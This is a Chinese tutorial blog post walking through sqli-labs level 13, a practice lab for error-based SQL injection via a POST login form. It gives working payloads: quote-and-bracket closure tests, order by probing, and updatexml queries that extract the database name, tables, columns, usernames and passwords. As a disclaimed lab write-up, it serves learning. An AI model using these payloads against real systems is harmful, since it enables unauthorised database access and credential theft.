当前位置: 首页 > news >正文

sqli-labs关卡13(基于post提交的单引号加括号的报错盲注)通关思路

news 2025/8/3 0:42:52

文章目录

  • 前言
  • 一、回顾第十二关知识点
  • 二、靶场第十三关通关思路
    • 1、判断注入点
    • 2、爆显位
    • 3、爆数据库名
    • 4、爆数据库表
    • 5、爆数据库列
    • 6、爆数据库关键信息
  • 总结

前言

此文章只用于学习和反思巩固sql注入知识,禁止用于做非法攻击。注意靶场是可以练习的平台,不能随意去尚未授权的网站做渗透测试!!!

一、回顾第十二关知识点

通过第十二关的学习,我们了解到post注入的基本流程,其实和get注入相差不大,只是注入的地方不一样罢了。

二、靶场第十三关通关思路

  • 1、判断注入点
  • 2、爆显位
  • 3、爆数据库名
  • 4、爆数据库表
  • 5、爆数据库列
  • 6、爆数据库关键信息

1、判断注入点

老规矩还是使用万能语句1 or 1=1 和 1 or 1=2发现页面正常,所以排除数字型。输入1'发现报错,报错信息为

You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right syntax to use
near ‘‘1’’) and password=(‘’) LIMIT 0,1’ at line 1

通过报错信息可以猜测应该是单引号加括号闭合,这里我们试一下构造payload

1') or 1=1#

1') or 1=2#

发现1=1页面正常,1=2页面异常,细心发现页面正常异常没有返回回显内容,所以不能用联合查询了。可以试一试报错注入或者是布尔盲注,我个人喜欢用报错注入。(如图所示)
在这里插入图片描述
在这里插入图片描述

2、爆显位

注入语句为

1') order by 3#

在这里插入图片描述
发现3报错,那么显位是2

3、爆数据库名

注入语句为

1') or updatexml(1,concat(0x3a,(select database()),0x3a),1)#

在这里插入图片描述
得数据库名

4、爆数据库表

注入语句为

1') and updatexml(1,concat(0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a),1)#

在这里插入图片描述
得到关键表名users

5、爆数据库列

注入语句为

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 2,1),0x3a),1)#

得到列名username,password
在这里插入图片描述
在这里插入图片描述

6、爆数据库关键信息

注入语句为

1') and updatexml(1,concat(0x3a,(select password from users limit 0,1),0x3a),1)#

1') and updatexml(1,concat(0x3a,(select username from users limit 0,1),0x3a),1)#

在这里插入图片描述

在这里插入图片描述
得到关键信息

总结

这一关用的是报错注入,布尔盲注也适用。如果不懂报错注入流程可以看我的文章第五关解析。此文章是小白自己为了巩固sql注入而写的,大佬路过请多指教!

http://www.lryc.cn/news/229740.html

相关文章:

  • SparkAi创作系统ChatGPT网站源码+详细搭建部署教程+AI绘画系统+支持GPT4.0+Midjourney绘画
  • shiro默认session设置永不超时
  • 前端食堂技术周刊第 104 期:Angular v17、GPTs、Vue vapor mode、Svelte Flow、Bundler 的设计取舍
  • list复制出新的list后修改元素,也更改了旧的list?
  • Qt绘制各种图形
  • NIO 笔记(二)Netty框架专题
  • HTTP——
  • 第13章 Java IO流处理(二) 字节流与字符流
  • 【论文阅读】(CTGAN)Modeling Tabular data using Conditional GAN
  • 如何进行iOS技术博客的备案?
  • RTSP/Onvif安防平台EasyNVR批量禁用/启用通道接口的详细操作步骤
  • 2个器件,做1个恒流源
  • SQL INSERT INTO SELECT 语句
  • Elasticsearch 在 Java 开发中的应用
  • linux 的uart驱动框架分析
  • 头歌答案HTML——基础
  • 【数据结构——队列的实现(单链表)】
  • 《LeetCode力扣练习》代码随想录——链表(移除链表元素---Java)
  • linux 安装 mini conda,linux下安装 Miniconda
  • 机器人 Null impedance(零阻抗)梳理
  • MDM9205开发环境搭建与编译调试
  • Linux操作系统使用及C高级编程-D3Linux shell命令(权限、输入输出)
  • 无线充,大功率小家电,智能家居,无人机快速充电等产品供电 LDR6328S芯片TYUPE-C PD诱骗电压 USB-C解决PD电源取电问题
  • 2023数字科技生态大会-数字安全论坛 学习笔记
  • 玩转ChatGPT:ARIMA模型定制GPT-1.0
  • CSDN每日一题学习训练——Java版(字符串相乘、子集、删除链表的倒数第 N 个结点)
  • PostgreSQL 判断JSONB数组是否包含特定的元素
  • idea中搭建Spring boot项目(借助Spring Initializer)
  • acwing算法基础之搜索与图论--染色法判断二分图
  • 塔式服务器是什么服务器?